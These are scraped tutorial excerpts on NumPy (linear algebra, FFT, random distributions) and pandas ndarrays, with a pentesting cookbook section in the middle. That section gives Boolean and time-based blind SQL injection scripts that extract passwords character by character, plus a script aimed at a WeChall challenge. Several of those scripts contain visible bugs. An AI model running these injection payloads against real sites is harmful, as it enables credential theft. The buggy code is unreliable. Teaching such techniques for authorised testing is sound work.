The inv() function only accepts square matrices; the pinv() function does not have this restriction and is therefore considered a generalization of the inverse. Time for action – computing the pseudo inverse of a matrix Let's compute the pseudo inverse of a matrix: First, create a matrix: A = np.mat("4 11 14;8 7 -2") print("An", A) The matrix we created looks like the following: A [[ 4 11 14] [ 8 7 -2]] Calculate the pseudo inverse matrix with the pinv() function: pseudoinv = np.linalg.pinv(A) print("Pseudo inversen", pseudoinv) The pseudo inverse result is as follows: Pseudo inverse [[-0.00555556 0.07222222] [ 0.02222222 0.04444444] [ 0.05555556 -0.05555556]] Multiply the original and pseudo inverse matrices: print("Check", A * pseudoinv) What we get is not an identity matrix, but it comes close to it: Check [[ 1.00000000e+00   0.00000000e+00] [ 8.32667268e-17   1.00000000e+00]] What just happened? We computed the pseudo inverse of a matrix with the pinv() function of the numpy.linalg module. The check by matrix multiplication resulted in a matrix that is approximately an identity matrix (see pseudoinversion.py): from __future__ import print_function import numpy as np   A = np.mat("4 11 14;8 7 -2") print("An", A)   pseudoinv = np.linalg.pinv(A) print("Pseudo inversen", pseudoinv)   print("Check", A * pseudoinv) Determinants The determinant is a value associated with a square matrix. It is used throughout mathematics; for more details, please refer to http://en.wikipedia.org/wiki/Determinant. For a n x n real value matrix, the determinant corresponds to the scaling a n-dimensional volume undergoes when transformed by the matrix. The positive sign of the determinant means the volume preserves its orientation (clockwise or anticlockwise), while a negative sign means reversed orientation. The numpy.linalg module has a det() function that returns the determinant of a matrix. Time for action – calculating the determinant of a matrix To calculate the determinant of a matrix, follow these steps: Create the matrix: A = np.mat("3 4;5 6") print("An", A) The matrix we created appears as follows: A [[ 3. 4.] [ 5. 6.]] Compute the determinant with the det() function: print("Determinant", np.linalg.det(A)) The determinant appears as follows: Determinant -2.0 What just happened? We calculated the determinant of a matrix with the det() function from the numpy.linalg module (see determinant.py): from __future__ import print_function import numpy as np   A = np.mat("3 4;5 6") print("An", A)   print("Determinant", np.linalg.det(A)) Fast Fourier transform The Fast Fourier transform (FFT) is an efficient algorithm to calculate the discrete Fourier transform (DFT). The Fourier series represents a signal as a sum of sine and cosine terms. FFT improves on more naïve algorithms and is of order O(N log N). DFT has applications in signal processing, image processing, solving partial differential equations, and more. NumPy has a module called fft that offers FFT functionality. Many functions in this module are paired; for those functions, another function does the inverse operation. For instance, the fft() and ifft() function form such a pair. Time for action – calculating the Fourier transform First, we will create a signal to transform. 
Calculate the Fourier transform with the following steps: Create a cosine wave with 30 points as follows: x = np.linspace(0, 2 * np.pi, 30) wave = np.cos(x) Transform the cosine wave with the fft() function: transformed = np.fft.fft(wave) Apply the inverse transform with the ifft() function. It should approximately return the original signal. Check with the following line: print(np.all(np.abs(np.fft.ifft(transformed) - wave) < 10 ** -9)) The result appears as follows: True Plot the transformed signal with matplotlib: plt.plot(transformed) plt.title('Transformed cosine') plt.xlabel('Frequency') plt.ylabel('Amplitude') plt.grid() plt.show() The following resulting diagram shows the FFT result: What just happened? We applied the fft() function to a cosine wave. After applying the ifft() function, we got our signal back (see fourier.py): from __future__ import print_function import numpy as np import matplotlib.pyplot as plt x = np.linspace(0, 2 * np.pi, 30) wave = np.cos(x) transformed = np.fft.fft(wave) print(np.all(np.abs(np.fft.ifft(transformed) - wave) < 10 ** -9)) plt.plot(transformed) plt.title('Transformed cosine') plt.xlabel('Frequency') plt.ylabel('Amplitude') plt.grid() plt.show() Shifting The fftshift() function of the numpy.fft module shifts zero-frequency components to the center of a spectrum. The zero-frequency component corresponds to the mean of the signal. The ifftshift() function reverses this operation. Time for action – shifting frequencies We will create a signal, transform it, and then shift the signal. Shift the frequencies with the following steps: Create a cosine wave with 30 points: x = np.linspace(0, 2 * np.pi, 30) wave = np.cos(x) Transform the cosine wave with the fft() function: transformed = np.fft.fft(wave) Shift the signal with the fftshift() function: shifted = np.fft.fftshift(transformed) Reverse the shift with the ifftshift() function. This should undo the shift. Check with the following code snippet: print(np.all(np.abs(np.fft.ifftshift(shifted) - transformed) < 10 ** -9)) The result appears as follows: True Plot the transformed and shifted signals with matplotlib: plt.plot(transformed, lw=2, label="Transformed") plt.plot(shifted, '--', lw=3, label="Shifted") plt.title('Shifted and transformed cosine wave') plt.xlabel('Frequency') plt.ylabel('Amplitude') plt.grid() plt.legend(loc='best') plt.show() The following diagram shows the effect of the shift and the FFT: What just happened? We applied the fftshift() function to a cosine wave. After applying the ifftshift() function, we got our signal back (see fouriershift.py): import numpy as np import matplotlib.pyplot as plt x = np.linspace(0, 2 * np.pi, 30) wave = np.cos(x) transformed = np.fft.fft(wave) shifted = np.fft.fftshift(transformed) print(np.all(np.abs(np.fft.ifftshift(shifted) - transformed) < 10 ** -9)) plt.plot(transformed, lw=2, label="Transformed") plt.plot(shifted, '--', lw=3, label="Shifted") plt.title('Shifted and transformed cosine wave') plt.xlabel('Frequency') plt.ylabel('Amplitude') plt.grid() plt.legend(loc='best') plt.show() Random numbers Random numbers are used in Monte Carlo methods, stochastic calculus, and more. Real random numbers are hard to generate, so, in practice, we use pseudo random numbers, which are random enough for most intents and purposes, except for some very special cases. These numbers appear random, but if you analyze them more closely, you will realize that they follow a certain pattern. The random numbers-related functions are in the NumPy random module.
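As a quick illustration (this sketch is not part of the original recipe; the seed value and sample sizes are arbitrary), a few of the module's draw functions look like this:

import numpy as np

np.random.seed(42)                        # arbitrary seed, so the run is reproducible
print(np.random.random(3))                # three uniform floats in [0, 1)
print(np.random.randint(0, 10, size=5))   # five integers drawn from 0..9
print(np.random.normal(size=2))           # two draws from the standard normal

The scripts that follow call np.random.seed() in the same way so that their plots can be reproduced.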
The core random number generator is based on the Mersenne Twister algorithm—a standard and well-known algorithm (see https://en.wikipedia.org/wiki/Mersenne_Twister). We can generate random numbers from discrete or continuous distributions. The distribution functions have an optional size parameter, which tells NumPy how many numbers to generate. You can specify either an integer or a tuple as size. This will result in an array filled with random numbers of appropriate shape. Discrete distributions include the geometric, hypergeometric, and binomial distributions. Time for action – gambling with the binomial The binomial distribution models the number of successes in an integer number of independent trials of an experiment, where the probability of success in each experiment is a fixed number (see https://www.khanacademy.org/math/probability/random-variables-topic/binomial_distribution). Imagine a 17th century gambling house where you can bet on flipping pieces of eight. Nine coins are flipped. If less than five are heads, then you lose one piece of eight, otherwise you win one. Let's simulate this, starting with 1,000 coins in our possession. Use the binomial() function from the random module for that purpose. To understand the binomial() function, look at the following section: Initialize an array, which represents the cash balance, to zeros. Call the binomial() function with a size of 10000. This represents 10,000 coin flips in our casino: cash = np.zeros(10000) cash[0] = 1000 outcome = np.random.binomial(9, 0.5, size=len(cash)) Go through the outcomes of the coin flips and update the cash array. Print the minimum and maximum of the outcome, just to make sure we don't have any strange outliers: for i in range(1, len(cash)):    if outcome[i] < 5:      cash[i] = cash[i - 1] - 1    elif outcome[i] < 10:      cash[i] = cash[i - 1] + 1    else:      raise AssertionError("Unexpected outcome " + outcome)   print(outcome.min(), outcome.max()) As expected, the values are between 0 and 9. In the following diagram, you can see the cash balance performing a random walk: What just happened? We did a random walk experiment using the binomial() function from the NumPy random module (see headortail.py): from __future__ import print_function import numpy as np import matplotlib.pyplot as plt     cash = np.zeros(10000) cash[0] = 1000 np.random.seed(73) outcome = np.random.binomial(9, 0.5, size=len(cash))   for i in range(1, len(cash)):    if outcome[i] < 5:      cash[i] = cash[i - 1] - 1    elif outcome[i] < 10:      cash[i] = cash[i - 1] + 1    else:      raise AssertionError("Unexpected outcome " + outcome)   print(outcome.min(), outcome.max())   plt.plot(np.arange(len(cash)), cash) plt.title('Binomial simulation') plt.xlabel('# Bets') plt.ylabel('Cash') plt.grid() plt.show() Hypergeometric distribution The hypergeometricdistribution models a jar with two types of objects in it. The model tells us how many objects of one type we can get if we take a specified number of items out of the jar without replacing them (see https://en.wikipedia.org/wiki/Hypergeometric_distribution). The NumPy random module has a hypergeometric() function that simulates this situation. Time for action – simulating a game show Imagine a game show where every time the contestants answer a question correctly, they get to pull three balls from a jar and then put them back. Now, there is a catch, one ball in the jar is bad. Every time it is pulled out, the contestants lose six points. 
If, however, they manage to get out 3 of the 25 normal balls, they get one point. So, what is going to happen if we have 100 questions in total? Look at the following section for the solution: Initialize the outcome of the game with the hypergeometric() function. The first parameter of this function is the number of ways to make a good selection, the second parameter is the number of ways to make a bad selection, and the third parameter is the number of items sampled: points = np.zeros(100) outcomes = np.random.hypergeometric(25, 1, 3, size=len(points)) Set the scores based on the outcomes from the previous step: for i in range(len(points)):    if outcomes[i] == 3:      points[i] = points[i - 1] + 1    elif outcomes[i] == 2:      points[i] = points[i - 1] - 6    else:     print(outcomes[i]) The following diagram shows how the scoring evolved: What just happened? We simulated a game show using the hypergeometric() function from the NumPy random module. The game scoring depends on how many good and how many bad balls the contestants pulled out of a jar in each session (see urn.py): from __future__ import print_function import numpy as np import matplotlib.pyplot as plt     points = np.zeros(100) np.random.seed(16) outcomes = np.random.hypergeometric(25, 1, 3, size=len(points))   for i in range(len(points)):    if outcomes[i] == 3:      points[i] = points[i - 1] + 1    elif outcomes[i] == 2:      points[i] = points[i - 1] - 6    else:      print(outcomes[i])   plt.plot(np.arange(len(points)), points) plt.title('Game show simulation') plt.xlabel('# Rounds') plt.ylabel('Score') plt.grid() plt.show() Continuous distributions We usually model continuous distributions with probability density functions (PDF). The probability that a value is in a certain interval is determined by integration of the PDF (see https://www.khanacademy.org/math/probability/random-variables-topic/random_variables_prob_dist/v/probability-density-functions). The NumPy random module has functions that represent continuous distributions—beta(), chisquare(), exponential(), f(), gamma(), gumbel(), laplace(), lognormal(), logistic(), multivariate_normal(), noncentral_chisquare(), noncentral_f(), normal(), and others. Time for action – drawing a normal distribution We can generate random numbers from a normal distribution and visualize their distribution with a histogram (see https://www.khanacademy.org/math/probability/statistics-inferential/normal_distribution/v/introduction-to-the-normal-distribution). Draw a normal distribution with the following steps: Generate random numbers for a given sample size using the normal() function from the random NumPy module: N=10000 normal_values = np.random.normal(size=N) Draw the histogram and theoretical PDF with a center value of 0 and standard deviation of 1. Use matplotlib for this purpose: _, bins, _ = plt.hist(normal_values,   np.sqrt(N), normed=True, lw=1) sigma = 1 mu = 0 plt.plot(bins, 1/(sigma * np.sqrt(2 * np.pi))   * np.exp( - (bins - mu)**2 / (2 * sigma**2) ),lw=2) plt.show() In the following diagram, we see the familiar bell curve: What just happened? We visualized the normal distribution using the normal() function from the random NumPy module. 
We did this by drawing the bell curve and a histogram of randomly generated values (see normaldist.py): import numpy as np import matplotlib.pyplot as plt N=10000 np.random.seed(27) normal_values = np.random.normal(size=N) _, bins, _ = plt.hist(normal_values, np.sqrt(N), normed=True, lw=1, label="Histogram") sigma = 1 mu = 0 plt.plot(bins, 1/(sigma * np.sqrt(2 * np.pi)) * np.exp( - (bins - mu)**2 / (2 * sigma**2) ), '--', lw=3, label="PDF") plt.title('Normal distribution') plt.xlabel('Value') plt.ylabel('Normalized Frequency') plt.grid() plt.legend(loc='best') plt.show() Lognormal distribution A lognormal distribution is a distribution of a random variable whose natural logarithm is normally distributed. The lognormal() function of the random NumPy module models this distribution. Time for action – drawing the lognormal distribution Let's visualize the lognormal distribution and its PDF with a histogram: Generate random numbers using the lognormal() function from the random NumPy module: N=10000 lognormal_values = np.random.lognormal(size=N) Draw the histogram and theoretical PDF with a center value of 0 and standard deviation of 1: _, bins, _ = plt.hist(lognormal_values, np.sqrt(N), normed=True, lw=1) sigma = 1 mu = 0 x = np.linspace(min(bins), max(bins), len(bins)) pdf = np.exp(-(np.log(x) - mu)**2 / (2 * sigma**2))/ (x * sigma * np.sqrt(2 * np.pi)) plt.plot(x, pdf, lw=3) plt.show() The fit of the histogram and theoretical PDF is excellent, as you can see in the following diagram: What just happened? We visualized the lognormal distribution using the lognormal() function from the random NumPy module. We did this by drawing the curve of the theoretical PDF and a histogram of randomly generated values (see lognormaldist.py): import numpy as np import matplotlib.pyplot as plt N=10000 np.random.seed(34) lognormal_values = np.random.lognormal(size=N) _, bins, _ = plt.hist(lognormal_values, np.sqrt(N), normed=True, lw=1, label="Histogram") sigma = 1 mu = 0 x = np.linspace(min(bins), max(bins), len(bins)) pdf = np.exp(-(np.log(x) - mu)**2 / (2 * sigma**2))/ (x * sigma * np.sqrt(2 * np.pi)) plt.xlim([0, 15]) plt.plot(x, pdf,'--', lw=3, label="PDF") plt.title('Lognormal distribution') plt.xlabel('Value') plt.ylabel('Normalized frequency') plt.grid() plt.legend(loc='best') plt.show() Bootstrapping in statistics Bootstrapping is a method used to estimate variance, accuracy, and other metrics of sample estimates, such as the arithmetic mean. The simplest bootstrapping procedure consists of the following steps: Generate a large number of samples from the original data sample having the same size N. You can think of the original data as a jar containing numbers. We create the new samples by N times randomly picking a number from the jar. Each time we return the number into the jar, so a number can occur multiple times in a generated sample. With the new samples, we calculate the statistical estimate under investigation for each sample (for example, the arithmetic mean). This gives us a sample of possible values for the estimator. Time for action – sampling with numpy.random.choice() We will use the numpy.random.choice() function to perform bootstrapping.
Start the IPython or Python shell and import NumPy: $ ipython In [1]: import numpy as np Generate a data sample following the normal distribution: In [2]: N = 500   In [3]: np.random.seed(52)   In [4]: data = np.random.normal(size=N)   Calculate the mean of the data: In [5]: data.mean() Out[5]: 0.07253250605445645 Generate 100 samples from the original data and calculate their means (of course, more samples may lead to a more accurate result): In [6]: bootstrapped = np.random.choice(data, size=(N, 100))   In [7]: means = bootstrapped.mean(axis=0)   In [8]: means.shape Out[8]: (100,) Calculate the mean, variance, and standard deviation of the arithmetic means we obtained: In [9]: means.mean() Out[9]: 0.067866373318115278   In [10]: means.var() Out[10]: 0.001762807104774598   In [11]: means.std() Out[11]: 0.041985796464692651 If we are assuming a normal distribution for the means, it may be relevant to know the z-score, which is defined as follows: In [12]: (data.mean() - means.mean())/means.std() Out[12]: 0.11113598238549766 From the z-score value, we get an idea of how probable the actual mean is. What just happened? We bootstrapped a data sample by generating samples and calculating the means of each sample. Then we computed the mean, standard deviation, variance, and z-score of the means. We used the numpy.random.choice() function for bootstrapping. Summary You learned a lot in this article about NumPy modules. We covered linear algebra, the Fast Fourier transform, continuous and discrete distributions, and random numbers. Resources for Article: Further resources on this subject: SciPy for Signal Processing [article] Visualization [article] The plot function [article]

SQL Injection

Packt
23 Jun 2015
11 min read
In this article by Cameron Buchanan, Terry Ip, Andrew Mabbitt, Benjamin May, and Dave Mound authors of the book Python Web Penetration Testing Cookbook, we're going to create scripts that encode attack strings, perform attacks, and time normal actions to normalize attack times. (For more resources related to this topic, see here.) Exploiting Boolean SQLi There are times when all you can get from a page is a yes or no. It's heartbreaking until you realise that that's the SQL equivalent of saying "I LOVE YOU". All SQLi can be broken down into yes or no questions, dependant on how patient you are. We will create a script that takes a yes value, and a URL and returns results based on a predefined attack string. I have provided an example attack string but this will change dependant on the system you are testing. How to do it… The following script is how yours should look: import requests import sys   yes = sys.argv[1]   i = 1 asciivalue = 1   answer = [] print "Kicking off the attempt"   payload = {'injection': ''AND char_length(password) = '+str(i)+';#', 'Submit': 'submit'}   while True: req = requests.post('<target url>' data=payload) lengthtest = req.text if yes in lengthtest:    length = i    break else:    i = i+1   for x in range(1, length): while asciivalue < 126: payload = {'injection': ''AND (substr(password, '+str(x)+', 1)) = '+ chr(asciivalue)+';#', 'Submit': 'submit'}    req = requests.post('<target url>', data=payload)    if yes in req.text:    answer.append(chr(asciivalue)) break else:      asciivalue = asciivalue + 1      pass asciivalue = 0 print "Recovered String: "+ ''.join(answer) How it works… Firstly the user must identify a string that only occurs when the SQLi is successful. Alternatively, the script may be altered to respond to the absence of proof of a failed SQLi. We provide this string as a sys.argv. We also create the two iterators we will use in this script and set them to 1 as MySQL starts counting from 1 instead of 0 like the failed system it is. We also create an empty list for our future answer and instruct the user the script is starting. yes = sys.argv[1]   i = 1 asciivalue = 1 answer = [] print "Kicking off the attempt" Our payload here basically requests the length of the password we are attempting to return and compares it to a value that will be iterated: payload = {'injection': ''AND char_length(password) = '+str(i)+';#', 'Submit': 'submit'} We then repeat the next loop forever as we have no idea how long the password is. We submit the payload to the target URL in a POST request: while True: req = requests.post('<target url>' data=payload) Each time we check to see if the yes value we set originally is present in the response text and if so, we end the while loop setting the current value of i as the parameter length. The break command is the part that ends the while loop: lengthtest = req.text if yes in lengthtest:    length = i    break If we don't detect the yes value, we add one to i and continue the loop: else:    i = i+1re Using the identified length of the target string, we iterate through each character and, using the ascii value, each possible value of that character. For each value we submit it to the target URL. Because the ascii table only runs up to 127, we cap the loop to run until the ascii value has reached 126. 
If it reaches 127, something has gone wrong: for x in range(1, length): while asciivalue < 126:  payload = {'injection': ''AND (substr(password, '+str(x)+', 1)) = '+ chr(asciivalue)+';#', 'Submit': 'submit'}    req = requests.post('<target url>', data=payload) We check to see if our yes string is present in the response and if so, break to go onto the next character. We append our successful to our answer string in character form, converting it with the chr command: if yes in req.text:    answer.append(chr(asciivalue)) break If the yes value is not present, we add to the ascii value to move onto the next potential character for that position and pass: else:      asciivalue = asciivalue + 1      pass Finally we reset ascii value for each loop and then when the loop hits the length of the string, we finish, printing the whole recovered string: asciivalue = 1 print "Recovered String: "+ ''.join(answer) There's more… This script could be potentially altered to handle iterating through tables and recovering multiple values through better crafted SQL Injection strings. Ultimately, this provides a base plate, as with the later Blind SQL Injection script for developing more complicated and impressive scripts to handle challenging tasks. See the Blind SQL Injection script for an advanced implementation of these concepts. Exploiting Blind SQL Injection Sometimes life hands you lemons, Blind SQL Injection points are some of those lemons. When you're reasonably sure you've found an SQL Injection vulnerability but there are no errors and you can't get it to return you data. In these situations you can use timing commands within SQL to cause the page to pause in returning a response and then use that timing to make judgements about the database and its data. We will create a script that makes requests to the server and returns differently timed responses dependant on the characters it's requesting. It will then read those times and reassemble strings. How to do it… The script is as follows: import requests   times = [] print "Kicking off the attempt" cookies = {'cookie name': 'Cookie value'}   payload = {'injection': ''or sleep char_length(password);#', 'Submit': 'submit'} req = requests.post('<target url>' data=payload, cookies=cookies) firstresponsetime = str(req.elapsed.total_seconds)   for x in range(1, firstresponsetime): payload = {'injection': ''or sleep(ord(substr(password, '+str(x)+', 1)));#', 'Submit': 'submit'} req = requests.post('<target url>', data=payload, cookies=cookies) responsetime = req.elapsed.total_seconds a = chr(responsetime)    times.append(a)    answer = ''.join(times) print "Recovered String: "+ answer How it works… As ever we import the required libraries and declare the lists we need to fill later on. We also have a function here that states that the script has indeed started. With some time-based functions, the user can be left waiting a while. In this script I have also included cookies using the request library. It is likely for this sort of attack that authentication is required: times = [] print "Kicking off the attempt" cookies = {'cookie name': 'Cookie value'} We set our payload up in a dictionary along with a submit button. The attack string is simple enough to understand with explanation. The initial tick has to be escaped to be treated as text within the dictionary. That tick breaks the SQL command initially and allows us to input our own SQL commands. Next we say in the event of the first command failing perform the following command with OR. 
We then tell the server to sleep one second for every character in the first row in the password column. Finally we close the statement with a semi-colon and comment out any trailing characters with a hash (or pound if you're American and/or wrong): payload = {'injection': ''or sleep char_length(password);#', 'Submit': 'submit'} We then set length of time the server took to respond as the firstreponsetime parameter. We will use this to understand how many characters we need to brute-force through this method in the following chain: firstresponsetime = str(req.elapsed).total_seconds We create a loop which will set x to be all numbers from 1 to the length of the string identified and perform an action for each one. We start from 1 here because MySQL starts counting from 1 rather than from zero like Python: for x in range(1, firstresponsetime): We make a similar payload as before but this time we are saying sleep for the ascii value of X character of the password in the password column, row one. So if the first character was a lower case a then the corresponding ascii value is 97 and therefore the system would sleep for 97 seconds, if it was a lower case b it would sleep for 98 seconds and so on: payload = {'injection': ''or sleep(ord(substr(password, '+str(x)+', 1)));#', 'Submit': 'submit'} We submit our data each time for each character place in the string: req = requests.post('<target url>', data=payload, cookies=cookies) We take the response time from each request to record how long the server sleeps and then convert that time back from an ascii value into a letter: responsetime = req.elapsed.total_seconds a = chr(responsetime) For each iteration we print out the password as it is currently known and then eventually print out the full password: answer = ''.join(times) print "Recovered String: "+ answer There's more… This script provides a framework that can be adapted to many different scenarios. Wechall, the web app challenge website, sets a time-limited, blind SQLi challenge that has to be completed in a very short time period. The following is our original script adapted to this environment. 
As you can see, I've had to account for smaller time differences in differing values, server lag and also incorporated a checking method to reset the testing value each time and submit it automatically: import subprocess import requests   def round_down(num, divisor):    return num - (num%divisor)   subprocess.Popen(["modprobe pcspkr"], shell=True) subprocess.Popen(["beep"], shell=True)     values = {'0': '0', '25': '1', '50': '2', '75': '3', '100': '4', '125': '5', '150': '6', '175': '7', '200': '8', '225': '9', '250': 'A', '275': 'B', '300': 'C', '325': 'D', '350': 'E', '375': 'F'} times = [] answer = "This is the first time" cookies = {'wc': 'cookie'} setup = requests.get('http://www.wechall.net/challenge/blind_lighter/ index.php?mo=WeChall&me=Sidebar2&rightpanel=0', cookies=cookies) y=0 accum=0   while 1: reset = requests.get('http://www.wechall.net/challenge/blind_lighter/ index.php?reset=me', cookies=cookies) for line in reset.text.splitlines():    if "last hash" in line:      print "the old hash was:"+line.split("      ")[20].strip(".</li>")      print "the guessed hash:"+answer      print "Attempts reset n n"    for x in range(1, 33):      payload = {'injection': ''or IF (ord(substr(password,      '+str(x)+', 1)) BETWEEN 48 AND      57,sleep((ord(substr(password, '+str(x)+', 1))-      48)/4),sleep((ord(substr(password, '+str(x)+', 1))-      55)/4));#', 'inject': 'Inject'}      req = requests.post('http://www.wechall.net/challenge/blind_lighter/ index.php?ajax=1', data=payload, cookies=cookies)      responsetime = str(req.elapsed)[5]+str(req.elapsed)[6]+str(req.elapsed) [8]+str(req.elapsed)[9]      accum = accum + int(responsetime)      benchmark = int(15)      benchmarked = int(responsetime) - benchmark      rounded = str(round_down(benchmarked, 25))      if rounded in values:        a = str(values[rounded])        times.append(a)        answer = ''.join(times)      else:        print rounded        rounded = str("375")        a = str(values[rounded])        times.append(a)        answer = ''.join(times) submission = {'thehash': str(answer), 'mybutton': 'Enter'} submit = requests.post('http://www.wechall.net/challenge/blind_lighter/ index.php', data=submission, cookies=cookies) print "Attempt: "+str(y) print "Time taken: "+str(accum) y += 1 for line in submit.text.splitlines():    if "slow" in line:      print line.strip("<li>")    elif "wrong" in line:       print line.strip("<li>") if "wrong" not in submit.text:    print "possible success!"    #subprocess.Popen(["beep"], shell=True) Summary We looked at how to attack strings through different penetration attacks via Boolean SQLi and Blind SQL Injection. You will find some various kinds of attacks present in the book throughout. Resources for Article: Further resources on this subject: Pentesting Using Python [article] Wireless and Mobile Hacks [article] Introduction to the Nmap Scripting Engine [article]

The pandas Data Structures

Packt
22 Jun 2015
25 min read
In this article by Femi Anthony, author of the book, Mastering pandas, starts by taking a tour of NumPy ndarrays, a data structure not in pandas but NumPy. Knowledge of NumPy ndarrays is useful as it forms the foundation for the pandas data structures. Another key benefit of NumPy arrays is that they execute what is known as vectorized operations, which are operations that require traversing/looping on a Python array, much faster. In this article, I will present the material via numerous examples using IPython, a browser-based interface that allows the user to type in commands interactively to the Python interpreter. (For more resources related to this topic, see here.) NumPy ndarrays The NumPy library is a very important package used for numerical computing with Python. Its primary features include the following: The type numpy.ndarray, a homogenous multidimensional array Access to numerous mathematical functions – linear algebra, statistics, and so on Ability to integrate C, C++, and Fortran code For more information about NumPy, see http://www.numpy.org. The primary data structure in NumPy is the array class ndarray. It is a homogeneous multi-dimensional (n-dimensional) table of elements, which are indexed by integers just as a normal array. However, numpy.ndarray (also known as numpy.array) is different from the standard Python array.array class, which offers much less functionality. More information on the various operations is provided at http://scipy-lectures.github.io/intro/numpy/array_object.html. NumPy array creation NumPy arrays can be created in a number of ways via calls to various NumPy methods. NumPy arrays via numpy.array NumPy arrays can be created via the numpy.array constructor directly: In [1]: import numpy as np In [2]: ar1=np.array([0,1,2,3])# 1 dimensional array In [3]: ar2=np.array ([[0,3,5],[2,8,7]]) # 2D array In [4]: ar1 Out[4]: array([0, 1, 2, 3]) In [5]: ar2 Out[5]: array([[0, 3, 5],                [2, 8, 7]]) The shape of the array is given via ndarray.shape: In [5]: ar2.shape Out[5]: (2, 3) The number of dimensions is obtained using ndarray.ndim: In [7]: ar2.ndim Out[7]: 2 NumPy array via numpy.arange ndarray.arange is the NumPy version of Python's range function:In [10]: # produces the integers from 0 to 11, not inclusive of 12            ar3=np.arange(12); ar3 Out[10]: array([ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11]) In [11]: # start, end (exclusive), step size        ar4=np.arange(3,10,3); ar4 Out[11]: array([3, 6, 9]) NumPy array via numpy.linspace ndarray.linspace generates linear evenly spaced elements between the start and the end: In [13]:# args - start element,end element, number of elements        ar5=np.linspace(0,2.0/3,4); ar5 Out[13]:array([ 0., 0.22222222, 0.44444444, 0.66666667]) NumPy array via various other functions These functions include numpy.zeros, numpy.ones, numpy.eye, nrandom.rand, numpy.random.randn, and numpy.empty. The argument must be a tuple in each case. For the 1D array, you can just specify the number of elements, no need for a tuple. numpy.ones The following command line explains the function: In [14]:# Produces 2x3x2 array of 1's.        ar7=np.ones((2,3,2)); ar7 Out[14]: array([[[ 1., 1.],                  [ 1., 1.],                  [ 1., 1.]],                [[ 1., 1.],                  [ 1., 1.],                  [ 1., 1.]]]) numpy.zeros The following command line explains the function: In [15]:# Produce 4x2 array of zeros.            
ar8=np.zeros((4,2));ar8 Out[15]: array([[ 0., 0.],          [ 0., 0.],            [ 0., 0.],            [ 0., 0.]]) numpy.eye The following command line explains the function: In [17]:# Produces identity matrix            ar9 = np.eye(3);ar9 Out[17]: array([[ 1., 0., 0.],            [ 0., 1., 0.],            [ 0., 0., 1.]]) numpy.diag The following command line explains the function: In [18]: # Create diagonal array        ar10=np.diag((2,1,4,6));ar10 Out[18]: array([[2, 0, 0, 0],            [0, 1, 0, 0],            [0, 0, 4, 0],            [0, 0, 0, 6]]) numpy.random.rand The following command line explains the function: In [19]: # Using the rand, randn functions          # rand(m) produces uniformly distributed random numbers with range 0 to m          np.random.seed(100)   # Set seed          ar11=np.random.rand(3); ar11 Out[19]: array([ 0.54340494, 0.27836939, 0.42451759]) In [20]: # randn(m) produces m normally distributed (Gaussian) random numbers            ar12=np.random.rand(5); ar12 Out[20]: array([ 0.35467445, -0.78606433, -0.2318722 ,   0.20797568, 0.93580797]) numpy.empty Using np.empty to create an uninitialized array is a cheaper and faster way to allocate an array, rather than using np.ones or np.zeros (malloc versus. cmalloc). However, you should only use it if you're sure that all the elements will be initialized later: In [21]: ar13=np.empty((3,2)); ar13 Out[21]: array([[ -2.68156159e+154,   1.28822983e-231],                [ 4.22764845e-307,   2.78310358e-309],                [ 2.68156175e+154,   4.17201483e-309]]) numpy.tile The np.tile function allows one to construct an array from a smaller array by repeating it several times on the basis of a parameter: In [334]: np.array([[1,2],[6,7]]) Out[334]: array([[1, 2],                  [6, 7]]) In [335]: np.tile(np.array([[1,2],[6,7]]),3) Out[335]: array([[1, 2, 1, 2, 1, 2],                 [6, 7, 6, 7, 6, 7]]) In [336]: np.tile(np.array([[1,2],[6,7]]),(2,2)) Out[336]: array([[1, 2, 1, 2],                  [6, 7, 6, 7],                  [1, 2, 1, 2],                  [6, 7, 6, 7]]) NumPy datatypes We can specify the type of contents of a numeric array by using the dtype parameter: In [50]: ar=np.array([2,-1,6,3],dtype='float'); ar Out[50]: array([ 2., -1., 6., 3.]) In [51]: ar.dtype Out[51]: dtype('float64') In [52]: ar=np.array([2,4,6,8]); ar.dtype Out[52]: dtype('int64') In [53]: ar=np.array([2.,4,6,8]); ar.dtype Out[53]: dtype('float64') The default dtype in NumPy is float. In the case of strings, dtype is the length of the longest string in the array: In [56]: sar=np.array(['Goodbye','Welcome','Tata','Goodnight']); sar.dtype Out[56]: dtype('S9') You cannot create variable-length strings in NumPy, since NumPy needs to know how much space to allocate for the string. dtypes can also be Boolean values, complex numbers, and so on: In [57]: bar=np.array([True, False, True]); bar.dtype Out[57]: dtype('bool') The datatype of ndarray can be changed in much the same way as we cast in other languages such as Java or C/C++. For example, float to int and so on. The mechanism to do this is to use the numpy.ndarray.astype() function. Here is an example: In [3]: f_ar = np.array([3,-2,8.18])        f_ar Out[3]: array([ 3. , -2. , 8.18]) In [4]: f_ar.astype(int) Out[4]: array([ 3, -2, 8]) More information on casting can be found in the official documentation at http://docs.scipy.org/doc/numpy/reference/generated/numpy.ndarray.astype.html. 
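As a small aside that is not in the original text, the dtype also determines how much memory each element occupies, and astype() always hands back a new array rather than converting in place. A quick sketch (with arbitrary values):

import numpy as np

ar = np.arange(5, dtype=np.float32)
print(ar.dtype, ar.itemsize, ar.nbytes)    # float32 4 20 -> four bytes per element

converted = ar.astype(np.int64)
print(converted.dtype)                     # int64
print(ar.dtype)                            # float32 - the original array is unchanged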
NumPy indexing and slicing Array indices in NumPy start at 0, as in languages such as Python, Java, and C++ and unlike in Fortran, Matlab, and Octave, which start at 1. Arrays can be indexed in the standard way as we would index into any other Python sequences: # print entire array, element 0, element 1, last element. In [36]: ar = np.arange(5); print ar; ar[0], ar[1], ar[-1] [0 1 2 3 4] Out[36]: (0, 1, 4) # 2nd, last and 1st elements In [65]: ar=np.arange(5); ar[1], ar[-1], ar[0] Out[65]: (1, 4, 0) Arrays can be reversed using the ::-1 idiom as follows: In [24]: ar=np.arange(5); ar[::-1] Out[24]: array([4, 3, 2, 1, 0]) Multi-dimensional arrays are indexed using tuples of integers: In [71]: ar = np.array([[2,3,4],[9,8,7],[11,12,13]]); ar Out[71]: array([[ 2, 3, 4],                [ 9, 8, 7],                [11, 12, 13]]) In [72]: ar[1,1] Out[72]: 8 Here, we set the entry at row1 and column1 to 5: In [75]: ar[1,1]=5; ar Out[75]: array([[ 2, 3, 4],                [ 9, 5, 7],                [11, 12, 13]]) Retrieve row 2: In [76]: ar[2] Out[76]: array([11, 12, 13]) In [77]: ar[2,:] Out[77]: array([11, 12, 13]) Retrieve column 1: In [78]: ar[:,1] Out[78]: array([ 3, 5, 12]) If an index is specified that is out of bounds of the range of an array, IndexError will be raised: In [6]: 